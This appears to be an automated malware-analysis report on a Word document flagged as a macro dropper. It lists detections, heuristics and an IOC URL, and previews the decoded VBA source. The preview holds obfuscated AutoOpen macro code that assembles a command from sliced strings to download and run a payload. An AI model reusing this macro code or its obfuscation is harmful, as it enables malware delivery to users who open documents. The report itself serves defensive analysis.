MALICIOUS
204
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating a Shell() call within the VBA macros. The AutoOpen macro is present, and a URL 'http://beamdream.de' was de-obfuscated from the VBA code. This suggests the macro is intended to download and execute a secondary payload from the provided URL.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6536288-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6536288-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
URL de-obfuscated from VBA string literal (1 URL) info OLE_VBA_OBFUSCATED_URLA VBA macro hides its download URL inside a string literal that is de-obfuscated at runtime — junk digits or a Replace() junk token interleaved through the URL, or the URL stored reversed (StrReverse). The decoded host is the next-stage payload URL (URLDownloadToFile/XMLHTTP/ShellExecute); surfaced as an IOC. Self-validating: only a transform that yields a syntactically valid host URL is reported.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://beamdream.de Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 151246 bytes |
SHA-256: d7ff1475942a42245a564d1b1d89096a42f743a4d384156aa112d6c7a2c02037 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "BBMNvKJtwU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub PaPLW(iMzTT)
For Each VWFhP In FIsSru
oqzqvq = (PDXcw * Sqr(TSJLN) / 37585 / Rnd(DYpwn - CSng(NYhdzj - bidkV * cEsSw / 56099)) / (sLmzhE * qjPBB))
Next
End Sub
Sub Edqia(tavlp)
For Each pKqwK In qTCwC
ivtLfu = (cjSzz * Sqr(KrYjK) / 94212 / Rnd(zasuj - CSng(VJKhBF - FAijhv * SNpWL / 83206)) / (AORjrB * oHDwin))
Next
For Each JRBRt In JKNsB
wHkkV = (pHUutz * Sqr(DwRsb) / 65371 / Rnd(HbJvn - CSng(RSbqB - hbFVD * hPpfE / 28972)) / (EHpar * mKwHV))
Next
For Each ozQRWj In tUPiwd
VtSNc = (tYjwb * Sqr(jZOOiT) / 69310 / Rnd(PZRzS - CSng(aVDoYr - iwsrlf * EQNRqi / 94470)) / (iFjOO * wvbVv))
Next
End Sub
Sub wYUuZk(EcWXzo)
For Each SwLzHo In VrzHJ
qjBQWp = (BfvSr * Sqr(iscIh) / 67668 / Rnd(cnzjcO - CSng(aajWn - HFYbF * HlkmC / 86951)) / (BFJtj * YjACj))
Next
For Each oHica In YfczcT
Cjbps = (wqUMB * Sqr(hzGOj) / 14865 / Rnd(sJQtY - CSng(JniNf - dqsjj * tHBjbU / 90500)) / (LsBRQv * YbqlmC))
Next
End Sub
Sub Autoopen()
On Error Resume Next
For Each jNScoJ In apRXR
ACIiww = (wQmMzk * Sqr(EOBuw) / 89320 / Rnd(YnQwf - CSng(IlDjuw - pWSIp * KkSaGf / 8602)) / (ULnWaX * bOrkRM))
Next
VEYtfDYop (LMCSwb + lEzqnDz + hvtFI)
For Each cFMKTa In oZQMTb
OIaXXb = (YGYohc * Sqr(mPtRS) / 76098 / Rnd(WBjRqW - CSng(mwpwWt - ZUVhj * EzoWl / 96776)) / (BJWvA * ksGuGj))
Next
End Sub
Sub jmKip(iONvX)
For Each mftWNK In sDscZu
iIRSaO = (abRpG * Sqr(bPEoOz) / 22622 / Rnd(IrVtj - CSng(oCnJko - bZwuUI * MDbjHc / 7624)) / (zEOaij * RvZqnM))
Next
For Each nHERp In pHuuqc
FQpmH = (LDjvK * Sqr(IBIBV) / 56423 / Rnd(WoPTb - CSng(nEnrJU - FiUAGm * PAUEMu / 23969)) / (wjGZQU * NpwNz))
Next
For Each TYLZb In zajIui
GWTLHh = (GGGlkD * Sqr(zUfDt) / 79663 / Rnd(wbJik - CSng(MHRYL - XOjuip * UNNSao / 47127)) / (AFBEB * dJvJjX))
Next
End Sub
Sub PwoiZ(fAPaAO)
For Each UCjJj In LHMBPT
wuEok = (SREOYk * Sqr(vsKkf) / 1191 / Rnd(nYaama - CSng(LGDwYO - vlwap * vwPoL / 47450)) / (uTzbWP * WZTdCJ))
Next
End Sub
Attribute VB_Name = "GKBRzWl"
Sub GOJpzu(IlPNrw)
For Each JcaJlr In RSYfz
lOWLCw = (MjRhSi * Sqr(RhOpSJ) / 28699 / Rnd(Zrplu - CSng(ovlJAF - tPDKv * fZKtr / 4361)) / (EkEjN * ajpfWR))
Next
End Sub
Function lEzqnDz()
On Error Resume Next
For Each RXnjX In daXSK
XHjbOw = (iiZEqC * Sqr(MfVEjh) / 87070 / Rnd(kIldVZ - CSng(ljRuE - jqIahY * UrSzic / 11650)) / (ETidli * bpkdY))
Next
For Each cOPqn In wdpBE
mdLOsO = (szivKw * Sqr(vrXzP) / 66069 / Rnd(FuNmwz - CSng(PaBkMs - tKFnR * LTuSFr / 64343)) / (FFqlW * hjzbv))
Next
MMkcV = JRtQMG("i.hc2oc1", 50370 - 50370 + 5 + 50370 - 50370, 50370 - 50370 + 2 + 50370 - 50370)
For Each wdWjL In GDCjSL
GQlAuj = (QWKVL * Sqr(qXUJMd) / 85664 / Rnd(fizNH - CSng(kdQYm - oPEwjC * qAZTBU / 24082)) / (jjsTp * wahom))
Next
For Each nlhbFt In miGvr
vTDPDX = (DUmAiS * Sqr(sSunNt) / 68414 / Rnd(jlRmw - CSng(jJbmt - XTtBa * NdTzh / 86521)) / (KiUoSh * MnjSzQ))
Next
btflHL = JRtQMG("zmS',)(d8bgN3mc, ", 75295 - 75295 + 4 + 75295 - 75295, 75295 - 75295 + 11 + 75295 - 75295)
For Each wXKKN In tLYYtM
fFojDY = (oVMVJE * Sqr(NkjbDJ) / 99510 / Rnd(GJpTD - CSng(wFvuFs - GzAOZ * jdKoA / 17701)) / (jbpwqD * QziujU))
Next
For Each NvpjJQ In sdVCLA
vTaOd = (wnlYZd * Sqr(pcDHC) / 656 / Rnd(LOCmp - CSng(iIjHz - cccNw * XUvaJ / 31793)) / (jPAPZ * AKmuj))
Next
qcklcQFMr = JRtQMG("bBBbo-wpWR+pWRepWR+pWRnpWR(& = dsadasnM'+'m7'(( Juhwb", 10705 - 10705 + 6 + 10705 - 10705, 10705 - 10705 + 45 + 10705 - 10705)
For Each nYcGn In iaTAX
PHzif = (lFmfJ * Sqr(itGtwv) / 81561 / Rnd(wwIlvO - CSng(Sfpnj - nzSQWi * IbfHP / 82299)) / (uAkiY * pQTwM))
Next
For Each jHNNFn In Gjnai
OJmOq = (zljFE * Sqr(tjPFbf) / 55721 / Rnd(JGWNi - CSng(rc
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.